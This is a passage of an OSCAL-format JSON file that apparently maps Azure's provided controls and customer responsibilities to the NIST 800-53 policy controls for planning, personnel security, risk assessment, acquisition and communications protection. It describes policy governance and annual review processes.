If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"bb858e1f-ec4e-40c6-8e87-1e7070aa9ae2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"}],"description":"The customer is responsible for reviewing and updating the current planning policy on a regular basis and following organization defined events.","provided-uuid":"ee23477d-d84d-43ce-be37-64777009eb35"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"184f8ab4-40b0-446f-8e50-5bade9ff383a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-1","statements":[{"uuid":"283f77d9-44c8-47fa-90ce-910293ca5254","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.a","by-components":[{"uuid":"358c5e53-004b-493a-98c6-c5b118a5a0f6","export":{"provided":[{"uuid":"9d8429ca-97e0-4030-a2ae-bcbe99e2bd7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"}],"description":"Azure addresses the personnel security policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a 
responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Personnel screening * Personnel security Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with personnel security are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
\nThe Azure Personnel Screening Standard Operating Procedure (SOP) implements the personnel security policy and associated controls and documents the following procedures: * Background checks * References * Screening requirements Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with personnel security are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"0fef20d2-f03e-4a40-aab0-e3bc634b7e3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"}],"description":"The customer is responsible for developing, documenting, and disseminating personnel security policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the personnel security policy and the associated personnel security controls.","provided-uuid":"9d8429ca-97e0-4030-a2ae-bcbe99e2bd7b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"98265df5-e859-47e8-aa73-3903ba478e42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.b","by-components":[{"uuid":"bb7c0463-8c22-4d7f-974b-cedea7145aa0","export":{"provided":[{"uuid":"c4e901c6-74ab-432b-b6cc-0655774e0997","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"1aeebe96-b4e9-4552-bbc3-86124f141696","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of personnel security planning policy and procedures.","provided-uuid":"c4e901c6-74ab-432b-b6cc-0655774e0997"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6237beec-86e2-4a87-9199-b99f87cb7a95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.c","by-components":[{"uuid":"694a4bfe-9433-4112-899d-c293ab77b43f","export":{"provided":[{"uuid":"a13bbf1a-9b93-4032-8465-de029f0eb536","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"502c2549-eaf7-457b-8085-ba8b04c931df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"}],"description":"The customer is responsible for reviewing and updating the current personnel security policy on a regular basis and following organization-defined events.","provided-uuid":"a13bbf1a-9b93-4032-8465-de029f0eb536"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ff143624-b776-4e84-b253-5647f58b4ca8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-1","statements":[{"uuid":"43338c5d-f380-43f8-97d8-5e59cd10aa49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.a","by-components":[{"uuid":"23925727-7d99-480a-8093-f10091d1d2fe","export":{"provided":[{"uuid":"15e2106b-415e-4864-adbd-c3cef7a9d8ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"}],"description":"Azure addresses the risk assessment policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all personnel that have a responsibility for 
security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all personnel involved in designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Organizational Risk Assessment * Compliance Framework Management Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. 
The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with risk assessment are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Risk and Exception Management Standard Operating Procedure (SOP) implements the risk assessment policy and associated controls and documents the following procedures: * Risk Assessment Approach * Risk Assessment Methodology * System Categorization * System Threat Environment * Risk Assessment Results Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with risk assessment are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"50539da0-5438-40b2-955a-5d6b3e5e8715","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"}],"description":"The customer is responsible for developing, documenting, and disseminating risk assessment policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the risk assessment policy and the associated risk assessment controls.","provided-uuid":"15e2106b-415e-4864-adbd-c3cef7a9d8ed"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"719e8b56-b3f5-43e9-8689-99bb7db2b4e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.b","by-components":[{"uuid":"b37ac208-191e-444f-9371-fa9048c2ed76","export":{"provided":[{"uuid":"c08fe64e-15c5-47ae-a330-c8e6f1566537","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for 
the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"b21420fd-d9cb-4235-abed-918262ec43c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the risk assessment policy and procedures.","provided-uuid":"c08fe64e-15c5-47ae-a330-c8e6f1566537"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"830b8155-b207-4876-9d01-1e73320d1326","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.c","by-components":[{"uuid":"e209649d-8996-4011-b7ff-278b2322463d","export":{"provided":[{"uuid":"5e6911ee-0602-461c-84c7-2ac715a99a8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"d46f6670-a026-49df-ba25-ea0f99fe73f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"}],"description":"The customer is responsible for reviewing and updating the current risk assessment policy on a regular basis and following organization defined events.","provided-uuid":"5e6911ee-0602-461c-84c7-2ac715a99a8d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc323a6b-c765-46ca-869c-95041652e203","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-1","statements":[{"uuid":"66ad086b-f1d0-497a-bf76-c4b58079ca35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.a","by-components":[{"uuid":"283592cf-034c-4f0f-a322-3a914d526956","export":{"provided":[{"uuid":"1c08b238-8533-44c9-9271-8f10721fa69c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"}],"description":"Azure addresses the system and services acquisition policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel 
that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Ownership of third-party relationships * Security Development Lifecycle (SDL) * Introduction of new hardware, software, or services Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system and services acquisition are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
\nTo meet controls for system and services acquisition, Azure maintains teams with responsibilities to procure professional services, review contracts against Microsoft corporate standards, and procure assets for the delivery of Azure services. Multiple standards, processes, and SOPs are maintained by individual Azure teams to support the implementation of, and adherence to, the MSPP section on Supplier Relationships. Microsoft system and services procurement activities are managed through a company-wide team. All external suppliers of services or systems must be approved by the Global Procurement Group (GPG) and have a signed contract and Master Supplier Services Agreement (MSSA) on file. The contract includes sections outlining security requirements and service level monitoring to be enforced. GPG requires the external suppliers of services to comply with all applicable Microsoft security policies and implement security procedures to prevent disclosure of Microsoft Confidential information. Microsoft includes provisions in the MSSA and any associated Statements of Work (SOW) with each vendor addressing the need to employ appropriate security controls. Additionally, vendors that handle high business impact data must be in annual compliance with the Microsoft Supplier Security and Privacy Assurance (SSPA) Program Guide. Statements of Work (SOW) and Purchase Orders (PO) can only be submitted for suppliers who have approved contracts. The GPG team as well as Microsoft's Corporate, External, and Legal Affairs (CELA) review these documents before they are approved. These materials are formally documented and stored within each team's internal Azure SharePoint site as a central repository. 
Only individuals with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles/responsibilities are given access to the material."}],"responsibilities":[{"uuid":"d0b7d6cc-a425-4696-bef5-e279119c2f81","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and services acquisition policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of system and services acquisition policy and the associated system and services acquisition controls.","provided-uuid":"1c08b238-8533-44c9-9271-8f10721fa69c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44d5c05b-0f67-4e0e-98cd-7772dc2d91cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.b","by-components":[{"uuid":"996a4d24-1b0d-4b8c-a565-f3cbdec2aa08","export":{"provided":[{"uuid":"f9f55224-13f7-485f-ad70-18818437efd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility 
for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"62941775-5fc4-4aaa-8774-86a89c34914d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the system and services acquisition policy and procedures.","provided-uuid":"f9f55224-13f7-485f-ad70-18818437efd4"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"11e3ea2b-64a6-484d-a2f4-552f46b8abc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.c","by-components":[{"uuid":"cfa636f9-8a8e-4374-a5fe-8dd17cd3b955","export":{"provided":[{"uuid":"ba618bbc-d50e-436e-914a-abae5c98c4ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"df4d2cfa-20ad-4ab2-b2fa-7a4ce4a5646d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"}],"description":"The customer is responsible for reviewing and updating the system and services acquisition procedures on a regular basis and following organization defined events.","provided-uuid":"ba618bbc-d50e-436e-914a-abae5c98c4ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c7c1c992-f0a2-4771-b0de-76ad8b7070a9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-1","statements":[{"uuid":"d2e79be0-6063-47e0-b981-465f27588644","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.a","by-components":[{"uuid":"0217737f-0290-423c-adf8-da00df26596c","export":{"provided":[{"uuid":"2b3d8cbb-d781-449d-a431-76af91eb495a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"}],"description":"Azure addresses the Microsoft-level system and communications policies as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all 
Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policies address the following: * Communications security * Communications across networks * Secure communications channels * Network design Additionally, the policies address the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide levels of support to all services. The policies indicate Microsoft management's commitment and are a critical component of the Microsoft risk management strategy, providing Azure personnel with a current set of clear and concise information security requirements. These policies are consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines currently applicable to Microsoft and Azure. Service teams may supplement the Microsoft and Azure policies and procedures with service-specific policies and procedures. Service-specific policies and procedures associated with system and communications are documented and stored within internal service team SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-specific policies or procedures. 
\nC+AI Security publishes additional standard operating procedures (SOPs) and Security Standards that facilitate and support the implementation of systems and communications protection controls in Azure. These SOPs and standards include: * Azure Access Control Standard Operating Procedure (SOP) * Azure Asset Management Standard Operating Procedure (SOP) * Azure Cryptographic Control Standard Operating Procedure (SOP) * Key Management Standard * Asset Classification Standard * Asset Protection Standard"}],"responsibilities":[{"uuid":"1bbdf7f7-07e4-41f0-b1d3-3eedf5fceaf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and communications protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the system and communications protection policy and the associated system and communications protection controls.","provided-uuid":"2b3d8cbb-d781-449d-a431-76af91eb495a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"90c0b0e4-6c82-4d63-b4a7-b272d8f55af0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.b","by-components":[{"uuid":"5160881f-7dc5-49df-b2d2-6fb0d3644723","export":{"provided":[{"uuid":"560baef7-68d4-4e66-b852-272514760f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. 
The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"dd85ea9b-6f65-4d62-b494-7696a95e2d1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of system and communications protection policy and procedures.","provided-uuid":"560baef7-68d4-4e66-b852-272514760f16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"54fdbae0-4b19-43d5-a465-b0898674fb43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.c","by-components":[{"uuid":"5f083231-0807-49ec-a511-257126f66785","export":{"provided":[{"uuid":"f04aa943-de30-438f-895d-b93e87dd8b62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"}],"description":"The Azure team updates the Azure SOPs at least annually 
through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"a587d325-dc6f-4086-8bac-9abee5534d37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"}],"description":"The customer is responsible for reviewing and updating the current system and communications policy on a regular basis and following organization defined events.","provided-uuid":"f04aa943-de30-438f-895d-b93e87dd8b62"}]},"description":"See inheritance and customer responsibility 